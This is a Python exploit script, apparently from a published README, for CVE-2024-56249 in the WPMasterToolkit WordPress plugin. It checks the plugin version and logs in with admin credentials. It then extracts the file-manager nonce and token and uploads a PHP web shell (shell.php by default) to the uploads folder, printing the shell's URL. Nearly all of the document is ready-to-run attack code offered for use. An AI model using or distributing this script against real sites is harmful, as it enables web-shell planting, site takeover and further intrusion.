README.md
Rendering markdown...
import requests
import re
from bs4 import BeautifulSoup
import argparse
import os
from urllib.parse import urlparse
# Exploit script by Nxploit | Khaled Alenazi
requests.packages.urllib3.disable_warnings()
def probe_vulnerability(target_url):
readme_url = f"{target_url}/wp-content/plugins/wpmastertoolkit/README.txt"
try:
response = requests.get(readme_url, verify=False, timeout=10)
if response.status_code == 200:
match = re.search(r'Stable tag:\s*([\d.]+)', response.text)
if match:
version = match.group(1)
print(f"[🔍] Detected plugin version: {version}")
if float(version.replace(".", "")) <= 1131:
print("[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...")
return True
else:
print("[❌] Target is NOT vulnerable. (Version is newer than 1.13.1).")
return False
else:
print("[⚠️] Could not determine plugin version.")
return False
else:
print("[❌] README file not found. Cannot verify the vulnerability.")
return False
except requests.RequestException as e:
print(f"[❌] Error while probing vulnerability: {e}")
return False
def breach_wp_login(session, login_url, username, password, headers):
print("[🔑] Attempting to log in...")
login_data = {
"log": username,
"pwd": password,
"rememberme": "forever",
"wp-submit": "Log In"
}
try:
response = session.post(login_url, data=login_data, headers=headers, timeout=10)
if any("wordpress_logged_in" in cookie.name for cookie in session.cookies):
print("[✅] Authentication successful!")
return True
else:
print("[❌] Authentication failed! Check credentials.")
return False
except requests.RequestException as e:
print(f"[❌] Error during authentication: {e}")
return False
def extract_exploit_tokens(session, exploit_url, headers):
print("[📡] Extracting security tokens...")
try:
response = session.get(exploit_url, headers=headers, timeout=10)
nonce_match = re.search(r'WPMastertoolkit_FileManager\s*=\s*\{.*?"nonce":"([a-zA-Z0-9]+)".*?\}', response.text)
token_match = re.search(r'name="token"\s*value="([a-zA-Z0-9]+)"', response.text)
if nonce_match and token_match:
nonce_value = nonce_match.group(1)
token_value = token_match.group(1)
print(f"[✅] Extracted nonce: {nonce_value}")
print(f"[✅] Extracted token: {token_value}")
return nonce_value, token_value
else:
print("[❌] Failed to retrieve nonce or token!")
return None, None
except requests.RequestException as e:
print(f"[❌] Error extracting security tokens: {e}")
return None, None
def deploy_payload(session, upload_url, file_path, file_name, nonce, token, headers):
print(f"[📤] Attempting to upload {file_name} to {file_path}...")
files = {
"file": (file_name, open(file_name, "rb"), "text/plain")
}
payload_data = {
"p": file_path,
"fullpath": file_path,
"token": token,
"nonce": nonce
}
try:
response = session.post(upload_url, headers=headers, files=files, data=payload_data, timeout=10)
if response.status_code == 200:
print("[✅] Upload request sent successfully.")
return True
else:
print(f"[❌] Upload failed! Server response: {response.text}")
return False
except requests.RequestException as e:
print(f"[❌] Error during payload upload: {e}")
return False
def check_file_uploaded(file_check_url):
response = requests.get(file_check_url)
if response.status_code == 200:
print(f"[🔥] Shell uploaded successfully! URL: {file_check_url}")
print("[ℹ️] File content:\n")
print(response.text)
else:
print("[❌] File not found in upload folder, despite HTTP 200 response.")
return response.status_code == 200
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=" Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi")
parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)")
parser.add_argument("-un", "--username", required=True, help="WordPress admin username")
parser.add_argument("-p", "--password", required=True, help="WordPress admin password")
parser.add_argument("-fp", "--filepath", default="wp-content/uploads/2025/03", help="File upload path (default: wp-content/uploads/2025/03)")
parser.add_argument("-fn", "--filename", default="shell.php", help="File name to upload (default: shell.php)")
args = parser.parse_args()
parsed_url = urlparse(args.url)
wordpress_folder = parsed_url.path.strip("/").split("/")[0] if parsed_url.path.strip("/") else "wordpress"
wordpress_url = args.url.strip().rstrip("/")
if not probe_vulnerability(wordpress_url):
exit()
session = requests.Session()
session.verify = False
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"}
login_url = f"{wordpress_url}/wp-login.php"
exploit_url = f"{wordpress_url}/wp-admin/admin.php?page=wp-mastertoolkit-settings-file-manager&p={wordpress_folder}/{args.filepath}"
upload_url = f"{wordpress_url}/wp-admin/admin.php?page=wp-mastertoolkit-settings-file-manager&p={wordpress_folder}/{args.filepath}"
if not breach_wp_login(session, login_url, args.username.strip(), args.password.strip(), headers):
exit()
nonce, token = extract_exploit_tokens(session, exploit_url, headers)
if not nonce or not token:
exit()
if deploy_payload(session, upload_url, args.filepath.strip(), args.filename.strip(), nonce, token, headers):
shell_url = f"{wordpress_url}/{args.filepath.strip()}/{args.filename.strip()}"
print(f"[🔥] Shell successfully uploaded! Access it here: {shell_url}")
check_file_uploaded(shell_url)